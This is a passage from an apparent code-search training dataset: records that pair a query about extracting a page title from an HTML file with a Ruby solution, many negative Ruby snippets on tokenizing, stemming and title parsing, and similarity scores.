"def rreduce(tokens)\n # NOTE scans from right to left\n size = tokens.size\n match = 1\n \n while match > 0 # last loop had any effect\n match = k = 0\n \n while k < tokens.size\n catch :done do\n self.class.reducers.each do |tags, block|\n # not enough tokens available\n next unless tokens.size - k >= tags.size\n \n mtokens = tokens[k, tags.size]\n \n # next unless all tags match\n next unless catch :fail do\n mtokens.zip(tags).each do |token,tag|\n case tag\n when Symbol, Module\n throw :fail unless token.include?(tag)\n when String\n throw :fail unless token.word == tag\n when Regexp\n throw :fail unless token.word =~ tag\n when Proc\n throw :fail unless tag.call(token)\n when nil\n # matches any token\n else\n throw :fail unless token.fetch(tag.class) == tag\n end\n end\n end\n \n object = block.call(self, *mtokens)\n if object.kind_of?(Token)\n puts \"@#{k}: OK #{tags.inspect}\" if options[:verbose]\n \n # restart parsing having replaced many tokens with one\n tokens[k, tags.size] = object\n # restart at beginning of array\n k = -1; match += 1\n throw :done\n else\n puts \"@#{k}: no #{tags.inspect}\" if options[:verbose]\n end\n end\n end\n \n k += 1\n end\n \n end\n tokens\n end",
"def getToolsStem( text)\n params = Hash.new\n params['text'] = text\n return doCurl(\"get\",\"/tools/stem\",params)\n end",
"def term_list\n terms = Array.new\n\n self.notes.each do |note|\n note.scrubbed_notes.each do |word|\n term_index = terms.index(word)\n if term_index.nil?\n terms.push(word)\n end\n end\n end\n terms\n end",
"def flatten(tokens)\n tokens.shift\n tokens.join(' ')\nend",
"def tokenize\n for c in @code.split(\" \").map(&:to_s)\n $tokens << getToken\n @code = @code.strip\n end\n $tokens\n end",
"def get_words(uid, stem = false)\n doc = Document.find(uid, term_vectors: true)\n add_dfs(doc)\n\n # This converts from a hash to an array like:\n # [[['word', pos], ['word', pos]], [['other', pos], ...], ...]\n word_list = doc.term_vectors.map do |k, v|\n [stem ? k.stem : k].product(v[:positions])\n end\n\n # Peel off one layer of inner arrays, sort it by the position, and\n # then return the array of just words in sorted order\n word_list.flatten(1).sort_by(&:last).map(&:first)\n end",
"def process\n tokenize(text).each do |word|\n token = TfIdfSimilarity::Token.new word\n if token.valid?\n @term_counts[token.lowercase_filter.classic_filter.to_s] += 1\n end\n end\n @size = term_counts.values.reduce(:+)\n end",
"def tokenize(data)\n return if data.nil?\n data = data.split(/\\W+/)\n if data.first == ''\n data = data.drop(1)\n end\n (0...data.size).each { |index|\n @total_words_counter += 1\n yield data[index] }\n end",
"def basic_stem\n # undo some euphonic changes so that we can recover\n # the basic stem\n form = @first_form.sub(/(?:μμαι)$/,'πμαι') # palatal\n form = form.sub(/(?:σμαι)$/,'τμαι') # dental\n form = form.sub(/(?:ουμαι)$/,'εομαι') # future contracted deponents\n\n # now remove the ending\n form.sub(/(?:ω|ον|α|ομαι|μαι|ην)$/,'')\n end",
"def mass_tikify(text)\n sentences = NLP.sentences(text)\n\n sentences.map do |s|\n tokens = NLP.tokenize(s).reject do |t|\n # Don't include usernames/urls as tokens\n t.include?('@') || t.include?('http')\n end\n\n tokens.map { |t| tikify(t) }\n end\n end",
"def respond(data_store, input, context)\n response_sentences = []\n\n @tagger.get_sentences(input).each do |sentence|\n response = []\n\n # select a random sentence from our 'sentence structure' table\n random_sentence = data_store.execute('SELECT * FROM post_sentences ORDER BY RANDOM() LIMIT 1').flatten.first\n tag(@tagger, random_sentence.titleize) do |token, tag|\n if should_replace(tag)\n response_token = nil\n\n # attempt to find bias tokens for this tag\n sentence.downcase.remove_punctuation.split.each do |input_token|\n query = 'SELECT * FROM post_tokens WHERE token=? AND tag=?'\n results = data_store.execute(query, [input_token, tag])\n puts \"#{input_token}, #{tag}: #{results.flatten.first}\"\n unless results.empty? || response.join.include?(input_token)\n response_token = results.flatten.first\n break\n end\n end\n\n # select a random word with the same tag our current token\n query = 'SELECT * FROM post_tokens WHERE tag=? ORDER BY RANDOM() LIMIT 1'\n response_token = data_store.execute(query, [tag]).flatten.first if response_token.nil?\n\n # default to the random sentence's token if we can't find anything else\n response_token = token if response_token.nil?\n else\n response_token = token\n end\n\n # add a space before our token, unless our token is punctuation\n response_token = \" #{response_token}\" unless tag.start_with?('PP')\n\n response << response_token\n end\n\n response_sentences << response.join.strip\n end\n\n return response_sentences.join(' ').strip\n end",
"def parse_new_lex filename\n\n\t\t@stemmizer = Stemmizer.new\n\n\t\tindex_es = Hash.new\n\n\t\tcon = RedisDB.new\n\t\tcon.connect_database 'stems'\n\n\t\tCSV.foreach(filename) do |row|\n\n\t\t\tstem_es = @stemmizer.stemmize row[0],'es'\n\n\t\t\tif(index_es.has_key? stem_es)\n\n\t\t\t\tindex_es[stem_es] = (index_es[stem_es].to_f + row[1].to_f).to_f/2\n\t\t\t\tcon.save_word 'stems_new_lex', stem_es, ((index_es[stem_es].to_f + row[1].to_f).to_f/2)\n\t\t\t\tputs(stem_es + ': ' + index_es[stem_es].to_s)\n\n\t\t\telse\n\n\t\t\t\tindex_es[stem_es] = row[1].to_f\n\t\t\t\tcon.save_word 'stems_new_lex', stem_es , row[1].to_f\n\t\t\t\tputs(stem_es + ': ' + index_es[stem_es].to_s)\n\n\t\t\tend\n\n\t\tend\n\n\tend",
"def farm_words(index, entry_content, freqs, word_counts)\n\twords = Sanitize.clean(entry_content.downcase).split(/[^a-zA-Z](?<!['\\-])/) \t# <= clean up & split the words\n\twords.each do |word|\n\t\tnext if !Blacklist.find_by_word(word).nil?\t\t\t\t\t\t\t\t\t\t\t\t\t# <= check against blacklist\n\t\tif freqs[word][index].nil?\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# <= if word doesn't exist yet\n\t\t\t(index - freqs[word].size).times { freqs[word] << 0\t}\t\t\t\t\t\t\t\t\t# <= add a zero for each entry until this one\n\t\t\tfreqs[word] << 1\n\t\telse\n\t\t\tfreqs[word][index] += 1\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# <= otherwise, just increment the count\n\t\tend\n\tend\n\tword_counts[index] += words.size\nend",
"def remove_stop_tokens(tokens, stop_words)\n\n # Looping through the list of tokens and removing all the stop words from the list\n for i in tokens\n if stop_words.member?(i)\n tokens.delete(i)\n end\n end\n \n return tokens\nend",
"def each \n if @array_words.length < 3\n return \"Length of the input_file is too small to produce trigrams\"\n end\n \n sentence = generate_sentence\n 0.upto(sentence.split.length - 1) do |x|\n yield sentence.split[x]\n end\n return sentence\n end",
"def process_stopwords(txt = self.search_text)\n #Needs to be set so highlighting will work properly (can't match quotes)\n self.highlight_token_array(txt)\n #Now put humpty dumpty back together without the nasty stopwords, sort the tokens by length\n self.search_token_array(txt).join(\" \")\n end",
"def stem_porter\n\n # make a copy of the given object and convert it to a string.\n w = self.dup.to_str\n \n return w if w.length < 3\n \n # now map initial y to Y so that the patterns never treat it as vowel\n w[0] = 'Y' if w[0] == ?y\n \n # Step 1a\n if w =~ /(ss|i)es$/\n w = $` + $1\n elsif w =~ /([^s])s$/ \n w = $` + $1\n end\n\n # Step 1b\n if w =~ /eed$/\n w.chop! if $` =~ MGR0 \n elsif w =~ /(ed|ing)$/\n stem = $`\n if stem =~ VOWEL_IN_STEM \n w = stem\n\tcase w\n when /(at|bl|iz)$/ then w << \"e\"\n when /([^aeiouylsz])\\1$/ then w.chop!\n when /^#{CC}#{V}[^aeiouwxy]$/o then w << \"e\"\n end\n end\n end\n\n if w =~ /y$/ \n stem = $`\n w = stem + \"i\" if stem =~ VOWEL_IN_STEM \n end\n\n # Step 2\n if w =~ SUFFIX_1_REGEXP\n stem = $`\n suffix = $1\n # print \"stem= \" + stem + \"\\n\" + \"suffix=\" + suffix + \"\\n\"\n if stem =~ MGR0\n w = stem + STEP_2_LIST[suffix]\n end\n end\n\n # Step 3\n if w =~ /(icate|ative|alize|iciti|ical|ful|ness)$/\n stem = $`\n suffix = $1\n if stem =~ MGR0\n w = stem + STEP_3_LIST[suffix]\n end\n end\n\n # Step 4\n if w =~ SUFFIX_2_REGEXP\n stem = $`\n if stem =~ MGR1\n w = stem\n end\n elsif w =~ /(s|t)(ion)$/\n stem = $` + $1\n if stem =~ MGR1\n w = stem\n end\n end\n\n # Step 5\n if w =~ /e$/ \n stem = $`\n if (stem =~ MGR1) ||\n (stem =~ MEQ1 && stem !~ /^#{CC}#{V}[^aeiouwxy]$/o)\n w = stem\n end\n end\n\n if w =~ /ll$/ && w =~ MGR1\n w.chop!\n end\n\n # and turn initial Y back to y\n w[0] = 'y' if w[0] == ?Y\n\n w\n end",
"def words\n sentences.map { |sentence| sentence.words.map { |word| word } } .flatten.each\n end",
"def pre_tokenize(text)\n normalized_text = text.gsub(/^every\\s\\b/, '')\n normalized_text = text.gsub(/^each\\s\\b/, '')\n normalized_text = text.gsub(/^on the\\s\\b/, '')\n normalized_text.downcase\n end",
"def read_tokens()\n\n # By adding @ to tokens, we're saving it also in the instance. We're not\n # going to use that, but it might be useful later.\n @tokens = []\n\n File.open(@filename) do |input_file|\n input_file.each do |line|\n line.split.each do |word|\n word = normalize(word)\n @tokens << word unless word.empty?\n end\n end\n end\n\n @tokens\n end",
"def tokenize(sentence)\n return [] if sentence.nil? || sentence.length == 0\n sentence.split(' ').map { |word| word.downcase.to_sym } # interesting that we symbolize words with punctuation ?!\n end",
"def recognize\n build_initial_itemset\n\n token_stream.each_with_index do |token, position|\n # if the previous invocation of this block did not populate list[position], then break out, because the parse has failed\n break if list[position].nil?\n \n # examine each item in list[position] only once...\n i = 0\n while i < list[position].size\n item = list[position][i]\n \n scan(token, item, position + 1)\n predict(item, position)\n complete(item, position)\n \n i += 1\n end\n end\n\n # run the predictor and completer on the last set in list, because it hasn't been predicted or completed yet.\n i = 0\n count = token_stream.count\n if list[count]\n while i < list[count].size\n item = list[count][i]\n \n predict(item, count)\n complete(item, count)\n \n i += 1\n end\n end\n \n # list.with_index{|arr,i| puts i; pp arr }\n \n # If the item set that resulted from processing the last token in the input contains an item \n # S -> ...•@1, that is, an item spanning the entire input and reducing to the start symbol,\n # we have found a valid parse!\n (list[token_stream.count] || []).any? do |item|\n item.non_terminal == grammar.start &&\n item.right_pattern.empty? &&\n item.position == 0\n end\n end",
"def process(input_stream)\n debug 'Beginning tokenization of input'\n\n @stream = input_stream\n @stream_char = 1\n\n @output = [] if @state == :root\n\n until @stream.strip.empty?\n tk = tokenize\n @output.append(tk) if tk.instance_of? Token\n end\n\n @output\n end",
"def export_synonyms(hits_per_page = 100, request_options = {}, &_block)\n res = []\n page = 0\n loop do\n curr = search_synonyms('', { :hitsPerPage => hits_per_page, :page => page }, request_options)['hits']\n curr.each do |synonym|\n res << synonym\n yield synonym if block_given?\n end\n break if curr.size < hits_per_page\n page += 1\n end\n res\n end",
"def extract\n # create hash of words with number of their instances in tokens excluding stopwords\n words_hash = Hash.new(0)\n @tokens.each { |w| \n unless w.empty? or stop_words_for(@language)[w]\n words_hash[w] += 1 \n end\n }\n\n idfs_hash = get_idfs(words_hash.keys)\n\n # calculate tf-idf for each word into keywords array\n keywords = []\n max_num = words_hash.values.max.to_f\n words_hash.each do |word, num|\n tf = num / max_num\n idf = idfs_hash[word]\n keywords << [word, (tf * idf).round(5), idf.round(5)]\n end\n\n # return keywords sorted by rank descending\n keywords.sort_by {|word, rank, idf| -rank}\n end",
"def stem\n _response_word.fetch(\"stem\", nil)\n end",
"def run_corpus # :nodoc:\n tokens = @processor.process\n tokens.each do |token|\n category = @db[token]\n @matches[category] << token if category # word's in corpus.\n end\n end",
"def words\n @phrase = @phrase.split(' ')\n end",
"def word_list\n # Returning only the terms of each definition as an array.\n list_of_terms = @words.map do |key, definition_instance|\n definition_instance.term\n end\n end",
"def tokens\n @tokens ||= scanner.tokenize(input)\n end",
"def words\n words = @phrase.split(\" \")\n words.each do |word|\n translate(word)\n end\n end",
"def bulk_tweet_shortener(array)\n replace= []\n \n array.each do |string|\n replace << string.split.each do |word| \n if dictionary.has_key?(\"#{word}\") == true\n word.replace(dictionary[\"#{word}\"])\n else word\n end\n end\n \n end \n\n replace.collect do |tweet| puts tweet.join(\" \") end\nend"
] | [
"0.7383151",
"0.64352137",
"0.63437766",
"0.6334966",
"0.61397344",
"0.5948949",
"0.58141166",
"0.57272047",
"0.5698453",
"0.56388116",
"0.56388116",
"0.5521572",
"0.55069983",
"0.5476669",
"0.5476669",
"0.54756314",
"0.54756314",
"0.5455903",
"0.5452764",
"0.5451128",
"0.5441654",
"0.5437673",
"0.5426502",
"0.5425493",
"0.5374424",
"0.53577024",
"0.5348645",
"0.5331603",
"0.53202343",
"0.5303031",
"0.52913386",
"0.52879274",
"0.52879274",
"0.526695",
"0.5266291",
"0.52658963",
"0.5264336",
"0.5233218",
"0.5218306",
"0.5190282",
"0.51893675",
"0.5182039",
"0.51714283",
"0.5160344",
"0.5160344",
"0.5158914",
"0.5146419",
"0.51263213",
"0.5117842",
"0.5114574",
"0.50837636",
"0.5081604",
"0.50759375",
"0.5070373",
"0.50700194",
"0.50535095",
"0.5052961",
"0.5037905",
"0.50356287",
"0.50356287",
"0.5027513",
"0.50258464",
"0.5019378",
"0.5017685",
"0.49952045",
"0.49757802",
"0.49636206",
"0.49635446",
"0.49623224",
"0.49563184",
"0.49503732",
"0.4948013",
"0.49460685",
"0.4945849",
"0.49440756",
"0.494126",
"0.4936631",
"0.4933707",
"0.49321052",
"0.49312317",
"0.4927943",
"0.4924566",
"0.4890093",
"0.4888344",
"0.48868737",
"0.48839",
"0.48775867",
"0.4869788",
"0.4855821",
"0.48478204",
"0.48428896",
"0.4841969",
"0.48414555",
"0.4840081",
"0.48285314",
"0.4826122",
"0.4821727",
"0.48206246",
"0.48149613",
"0.4811938"
] | 0.8478054 | 0 |
get_title takes a file name a returns the text within the HTML title tag of the file | def get_title(file_name)
html = File.read(file_name)
doc = Nokogiri::HTML(html)
begin
# Grabbing the title from the page
title = doc.css("title")[0].text.strip
rescue NoMethodError
puts "NoMethodError"
puts file_name
title = nil
end
return title
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def get_title\n r = %r{((\\d+\\.)+\\s*)(?<title>(.)*)\\.html\\.erb}\n match = r.match(file_name)\n raise BadFilenameException, \"Can't match the file: #{file_name}\" unless match\n t = match[:title].strip\n end",
"def title\n CGI::unescape(file_name.to_s).gsub(/\\.\\w+$/, '').titleize\n end",
"def title\n CGI::unescape(file_name.to_s).gsub(/\\.\\w+$/, '').titleize\n end",
"def title\n CGI::unescape(self.file_name).gsub(/\\.\\w+$/, '').titleize\n end",
"def file_title(path)\n filename_from_path(path).split(\".\")[0]\n end",
"def title\n #Flip off the part after the last dot, including that dot: find the filename without extensions\n fragments = @filename.split('.')\n fragments.pop\n title = fragments.join('.')\n\n return title.gsub(/[_]/, ' ').capitalize\n end",
"def discover_file_title(page = current_page)\n\n if page.data.title\n return page.data.title # Frontmatter title\n else\n filename = page.url.split(/\\//).last.gsub('%20', ' ').titleize\n\n return filename.chomp(File.extname(filename))\n end\n end",
"def title\n #CGI::unescape(file_name.to_s).gsub(/\\.\\w+$/, '').titleize\n self[:file_name].gsub(/\\.\\w+$/, '').titleize rescue ''\n end",
"def title\n resource_title.presence || CGI.unescape(file_name.to_s).gsub(/\\.\\w+$/, '').titleize\n end",
"def title\n filename.nil? ? nil : File.basename(filename)\n end",
"def title\n if file =~ /README.md/\n result = File.basename File.dirname(file)\n else\n result = File.basename(file,'.md')\n end\n result.tr '-', ' '\n end",
"def to_title(file)\n # Strip .md if it exists\n title = file.gsub(/.md$/, '')\n\n title = title.gsub(/-/, ' ')\n title = title.gsub(/([A-Z][a-z])/, ' \\1').strip\n title = title.split.map { |word| word[0].upcase+word[1..99999] }.join(' ')\n return title\n end",
"def get_saved_title()\n begin\n return File.read(TITLE_FILE).strip!\n rescue => e\n return \"\"\n end\nend",
"def file_title(title)\n title.downcase.gsub(/\\s+/, '-').gsub(/-{2,}/, '-').gsub(':', '')\nend",
"def file_name(title)\n name = title.gsub(/[\\r\\n]/, \" \")\n .gsub(/[^a-zA-Z\\d\\s]/, \"\")\n .gsub(/ /, \"_\")\n\n name.length > 31 ? name[0..30] : name\n end",
"def file_name(title)\n name = title.gsub(/[\\r\\n]/, ' ')\n .gsub(/[^a-zA-Z\\d\\s]/, '')\n .tr(' ', '_')\n\n name.length > 31 ? name[0..30] : name\n end",
"def populate_title\n if self.title.blank?\n self.title = self.file_file_name.blank? ? \"\" : self.file_file_name.gsub(/_/, \" \").capitalize\n end\n\tend",
"def file_to_pagename(filename)\n\t\tfilename.chomp(\".md\").gsub('_', ' ').capitalize\n\tend",
"def file_to_pagename(filename)\n\t\tfilename.chomp(\".md\").gsub('_', ' ').capitalize\n\tend",
"def title\n @blob.basename.split(\".\").first.capitalize\n end",
"def pageTitle(url)\r\n<<<<<<< HEAD\r\n\r\nresult = open(url).read.scan(/<title>(.*?)<\\/title>/)[0]\r\n result[0]\r\n\r\n=======\r\n # Fetch and parse HTML document\r\n doc = Nokogiri::HTML(open(url))\r\n doc.search('title').children[0].text\r\n>>>>>>> d785f49315f21edd5329234273e9431f9c199eea\r\nend",
"def title\n @title ||= doc.search('.moviename-big').xpath('text()').text.strip\n end",
"def title\n return @title if @title\n return @filename if @filename\n return @type if @type\n return \"Unknown file name\"\n end",
"def title_folded_to_filename\n self[:title].gsub(/[^a-z0-9-]/) do |c|\n case c\n when /\\s+|\\./ then '-'\n when /[A-Z]+/ then c.downcase\n else ''\n end\n end.gsub(/\\-+/,'-')\n end",
"def title\n if has_local? :title\n locals[:title]\n else\n File.basename(logical_path).titleize\n end\n end",
"def title\n @basename.wikify\n end",
"def titre_in_file\n if File.exist? fullpath\n titre_in_code File.read(fullpath).force_encoding('utf-8')\n else\n debug \"= Fichier ID #{id} introuvable (#{fullpath}). Impossible de récupérer son titre\"\n \"\"\n end\n end",
"def page_content(title)\n\tFile.read(\"pages/#{title}.txt\")\n rescue Errno::ENOENT\n \treturn nil\n end",
"def set_title\n @title = File.basename(@absolute_path)\n @title.sub!(/^[0-9][0-9]-/, '')\n @title.gsub!(/_/, ' ')\n @title.gsub!(/-/, ', ')\n end",
"def quick_title(song)\n File.basename(song, File.extname(song)).gsub(/^[^A-Za-z]+\\s+(\\w)/, \"\\\\1\")\n end",
"def get_title\n @doc.css('title').text\n end",
"def create_filename(newpost)\n File.readlines(newpost).each do |line|\n tidytitle = ''\n # Extract title from the h2 line, and create tidytitle and filename\n if line =~ />\\w.*h2/\n # $& returns exact match, not entire line. Strip the tags surroundging the title.\n @title = $&.sub('>','').sub('</a></h2','') \n # Remove illegaal characters from title\n tidytitle = @title.downcase.gsub(/(#|%|&|\\*|<|>|\\{|\\}|\\\\|:|;|,|<|>|\\?|\\/|\\+|'|!|\\.)/,'').gsub(/ /,'-').gsub(/-+/,'-') + '.html'\n # Create filename preceded with datestamp\n @filename = @filedate + '-' + tidytitle\n break\n end\n end\nend",
"def title\n @title_pages.each { |tp| tp.title and return tp.title }\n nil\n end",
"def title(filename, _hue = 0)\n load_image(@title_cache, filename, Titles_Path, @title_data)\n end",
"def to_title(file_slug)\n if file_slug == 'index' && !@pointer['id'].index('/').nil?\n file_slug = @pointer['id'].split('/')[-2]\n end\n\n Ruhoh::StringFormat.titleize(file_slug)\n end",
"def extract_title(entry)\n if entry.title and not entry.title.empty?\n entry.title\n elsif entry.content && entry.content.first && entry.content.first.value.is_a?(String)\n content = entry.content.first.value\n \n if content.match(/^<?p?>?<(strong|h1|h2|h3|h4|b)>([^<]*)<\\/\\1>/i)\n $2\n else\n content.split(/\\n|<br ?\\/?>/).each do |line|\n potential_title = line.gsub(/<\\/?[^>]*>/, \"\").chomp # strip html\n break potential_title if potential_title and not potential_title.empty?\n end.split(/!|\\?|\\./).first\n end\n else\n \"Untitled\"\n end\n end",
"def fileset_title(filename)\n case parent\n when Numismatics::Coin\n coin_image_title(filename)\n else\n filename\n end\n end",
"def title\n @data.title ||= parsed_document.css('title').inner_html.gsub(/\\t|\\n|\\r/, '') rescue nil\n end",
"def extract_default_title\n\t\treturn self.name unless self.readme&.table_of_contents&.first\n\t\ttitle = self.readme.table_of_contents.first.text\n\t\ttitle ||= self.name\n\tend",
"def page_content(title)\n File.read(\"pages/#{title}.txt\")\nrescue Errno::ENOENT\n return nil\nend",
"def extract_title_from_page(page_path)\n f = File.open(page_path)\n file_contents = f.read\n f.close\n\n markdown_translator = Yuzu::Translators::Translator.translators[:markdown]\n markdown_translator.extract_title_from_contents(file_contents)\n end",
"def title\n doc.css(\"titleproper\").children.first.text.strip\n end",
"def title(title_name)\n h.content_tag :h2 do\n title_name.present? ? title_name : \"Perfis\"\n end\n end",
"def to_title(file_slug)\n file_slug.gsub(/[^\\p{Word}+]/u, ' ').gsub(/\\b\\w/){$&.upcase}\n end",
"def to_title(file_slug)\n if file_slug == 'index' && !@pointer['id'].index('/').nil?\n file_slug = @pointer['id'].split('/')[-2]\n end\n\n file_slug.gsub(/[^\\p{Word}+]/u, ' ').gsub(/\\b\\w/){$&.upcase}\n end",
"def set_title \n write_attribute(:title, File.basename(file_name, '.mp4')) if title.blank?\n end",
"def generate_filename(title)\n \"#{formatted_current_timestamp}-#{slug_for(title)}.md\"\nend",
"def title\n @title ||= (Nokogiri::HTML.parse(@html).title).to_s.gsub(/\\n|\\t|\\r/,\"\")\n end",
"def get_title\n base_title = get_name_or_logo\n @title.nil? ? base_title : \"#{base_title} | #{@title}\"\n end",
"def getTitle(doc)\n\tfirstLine = doc.strip[/^[^\\n]+(?=\\n|$)/]\n\tfirstLine.length <= TITLE_LENGTH ? firstLine : firstLine[0,TITLE_LENGTH-3]+\"...\"\nend",
"def get_title_for_link link\n begin\n doc = Nokogiri::HTML(open(link))\n node = doc.search('h1').first || doc.search('title').first\n node.xpath('.//text()').to_s.strip\n rescue\n # If something goes wrong, use link as a title.\n link\n end\nend",
"def page_title\n \"which fileset for #{path}\"\n end",
"def coin_image_title(filename)\n if /R/.match?(filename)\n \"Reverse\"\n elsif /O/.match?(filename)\n \"Obverse\"\n else\n filename\n end\n end",
"def get_title\n title = @doc.css(\"div.headline h1\").text.gsub(\" From Our Partners\", \"\")\n end",
"def get_page_title(page_doc)\n\treturn page_doc.css('title').text.strip\nend",
"def find_title(url)\n # In three \"easy\" steps:\n # 1. Use \"open\" to download the contents of URL\n # 2. Use one of the methods described below to extract the\n # contents of the title tag.\n # 3. Return the contents of the title tag.\n page = Nokogiri::HTML(open(url))\n links = page.css(\"title\")\n\n return links.text\nend",
"def title\n return @title if @title\n if matches = class_const(:TITLE_RE).match(page)\n @title = matches[1].to_s.strip\n title_processor\n @title = decode_entities(@title)\n end\n end",
"def file_name\n # file = full_name\n # file = file.gsub('::', '/')\n # file = file.gsub('#' , '/')\n # file = file.gsub('.' , '-')\n # #file = File.join(output, file + '.html')\n # file\n WebRI.entry_to_path(full_name)\n end",
"def discover_directory_title(name, directory_path)\n\n # Check for a .display_info file in the source directory\n display_info_file_path = File.join(\"source\", directory_path, \".display_info\")\n\n if File.file?(display_info_file_path)\n\n display_info_hash = YAML.load_file(display_info_file_path)\n\n return display_info_hash.has_key?(\"title\") ? display_info_hash[\"title\"] : \"No Title Key Set\"\n else\n\n # No file found, so just parse the directory name\n return name.gsub(\"%20\", \" \").titleize\n end\n end",
"def title\n @title ||= self.content.split(@@title_separator).first unless self.content.nil?\n end",
"def get_h2_titles_from_rendered_contents(website_file)\n title_regex = Regexp.new('<h2[^>]*?>([\\w\\W]*?)</h2>')\n title_matches = website_file.rendered_contents.scan(title_regex)\n title_matches.collect {|m| m[0].to_s}\n end",
"def title\n @title ||= parsed_document.css('title').inner_text rescue nil\n end",
"def read_draft_title\n match = read.match(/title:\\s+(.+)?$/)\n match[1] if match\n end",
"def fix_title t\n # remove .html\n t1 = t.sub(/\\.html$/,'')\n # add /wiki/ unless it exists\n if t1.index(\"/wiki/\")\n return t1\n end\n return \"/wiki/\" + t.sub(/\\.html$/,'')\nend",
"def fix_title t\n # remove .html\n t1 = t.sub(/\\.html$/,'')\n # add /wiki/ unless it exists\n if t1.index(\"/wiki/\")\n return t1\n end\n return \"/wiki/\" + t.sub(/\\.html$/,'')\nend",
"def title(params = {})\n reload_metadata() if params[:reload]\n return self.api_file.title\n end",
"def title\n @doc.xpath(\"/html/head/title\").first&.text\n end",
"def page_title \n raw %(<title>#{page_title_raw}My USA Coin</title>)\n end",
"def title\n @title ||= Utilities.longest_common_substring_in_array(titles.values) \n @title = titles[:og_title] unless title_ok?\n @title = titles[:html_title] unless title_ok?\n @title = titles[:from_doc] unless title_ok?\n\n @title\n end",
"def filename\n @basename + PAGE_FILE_EXT\n end",
"def title\n CGI::unescape(image_name.to_s).gsub(/\\.\\w+$/, '').titleize\n end",
"def page_title title= nil\n\t\tif title\n\t\t\tcontent_for(:page_title) { \"#{title} - 2da.re\" }\n\t\t\treturn title\n\t\telse\n\t\t\tcontent_for?(:page_title) ? content_for(:page_title) : \"Ready 2da.re?\"\n\t\tend\n\tend",
"def get_title(url)\n Mechanize.new.get(url).title\n end",
"def title\n title_raw.downcase\n end",
"def name; (page.title rescue ''); end",
"def name; (page.title rescue ''); end",
"def title(page_title = nil)\n if page_title\n content_for(:title) do\n page_title\n end\n else\n content_for(:title) do\n \"DateIdeas.ca\"\n end\n end\n end",
"def extract_title\n at_css('title').text\n end",
"def title()\n @markdown_document.title()\n end",
"def rendered_name\n result = filename\n result = caption if !caption.blank?\n result\nend",
"def raw_title\n document.at(\"h1\").innerText\n end",
"def get_video_title(youtube_url)\n doc = Hpricot(open(youtube_url))\n (doc/\"title\").each do |title|\n return $1 if title.inner_text =~ %r{YouTube - (.+)}\n end\nend",
"def fetch_title_by_using_stdlib(uri)\n match = uri.read.scan(/<title>(.*?)<\\/title>/i)\n return \"\" unless match.first && match.first.first\n\n match.first.first\n end",
"def get_display_title(title)\n page_info_get_val(title, 'displaytitle', 'displaytitle')\n end",
"def title\n @title ||= details.at(\"h1.header\").text.strip rescue nil\n end",
"def scrape_title( page )\n\t\tpage.title.split( ' - ' )[0]\n\tend",
"def get_filename(pagename)\n\t\tget_permalink(pagename) + \".md\"\n\tend",
"def get_filename(pagename)\n\t\tget_permalink(pagename) + \".md\"\n\tend",
"def title(title)\n filename(title)\n @methods[:title] = title\n end",
"def title\n name.gsub(/_/, ' ')\n end",
"def get_title(n)\n description = Nokogiri::HTML(@description_xpath[n].text).text\n if description.include?(\"IF YOU GO\")\n description = description.split(\"IF YOU GO\")[1]\n if description.include?(\"Where\")\n title = description.split(\"Where\")[0]\n # Title must fit on single line\n title.gsub!(\"\\n\", \" \").strip!\n title\n else\n super(n)\n end\n else\n super(n)\n end\n end",
"def text_name\n title.to_s.t.html_to_ascii\n end",
"def page_title(title)\n content_for_wrapper(:page_title, title)\n end",
"def show\n @title = @stocked_file.original_name\n end",
"def title(page_title)\n content_for :title do\n page_title\n end\n end",
"def full_title(page_title = '')\n base_title = \"WriteIt\"\n if page_title.empty?\n base_title\n else\n page_title + \" | \" + base_title\n end\n end",
"def document_show_html_title\n @document[Blacklight.config[:show][:html_title]]\n end",
"def page_content(title)\n File.read(\"pages/#{title}.txt\")\nrescue Errno::ENOENT #if file isn't there, we just won't get anything back \n return nil\nend",
"def title\n @title ||= parsed.css('head title').inner_text rescue nil\n end",
"def title\n Sanitize.clean(name).strip\n end"
] | [
"0.8598528",
"0.8095545",
"0.80953485",
"0.80056685",
"0.79147553",
"0.78786373",
"0.78640026",
"0.7862644",
"0.7758443",
"0.7724523",
"0.75914115",
"0.7350282",
"0.73062795",
"0.72698486",
"0.72686887",
"0.7233489",
"0.72191924",
"0.7095204",
"0.7095204",
"0.70673436",
"0.703212",
"0.7022024",
"0.6974123",
"0.69501436",
"0.69418436",
"0.69102484",
"0.68808454",
"0.68607074",
"0.6859951",
"0.68521464",
"0.6850888",
"0.68484885",
"0.6846924",
"0.680202",
"0.67598855",
"0.6745066",
"0.6720404",
"0.6713292",
"0.67003244",
"0.6689516",
"0.6678787",
"0.6664226",
"0.6653804",
"0.66528565",
"0.66279614",
"0.6625007",
"0.66028816",
"0.6602669",
"0.66022325",
"0.66018534",
"0.6599151",
"0.65970683",
"0.65914524",
"0.6586695",
"0.65842104",
"0.65836084",
"0.65572405",
"0.65515417",
"0.65463895",
"0.6531143",
"0.652057",
"0.6520003",
"0.65198684",
"0.6511911",
"0.6511911",
"0.6492646",
"0.6492089",
"0.6478964",
"0.64638674",
"0.64633214",
"0.64615566",
"0.64534754",
"0.6441518",
"0.6430244",
"0.64292413",
"0.64292413",
"0.64266604",
"0.64222455",
"0.6414858",
"0.6411847",
"0.64100754",
"0.64063466",
"0.6401958",
"0.63986516",
"0.6390148",
"0.6388582",
"0.6386112",
"0.6386112",
"0.6384681",
"0.6381238",
"0.6372474",
"0.6371161",
"0.6361574",
"0.6356111",
"0.6354461",
"0.6346121",
"0.6344689",
"0.633951",
"0.6336964",
"0.63325155"
] | 0.80919725 | 3 |
get_file_detials takes a file name containg the index and returns the data of the file i.e. its name and url in a hash table | def get_file_details(file_name)
fd = {}
# Looping through the file and updating the name and url variable with the new data
# and then finally adding them to the hash table
File.readlines(file_name).each do |line|
data = line.split(" ")
puts data[2]
name = data[0]
url = data[2]
fd[name] = url
end
puts fd
return fd
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def file_list(hash)\n\nend",
"def file_list(hash)\n\nend",
"def get_file(url); end",
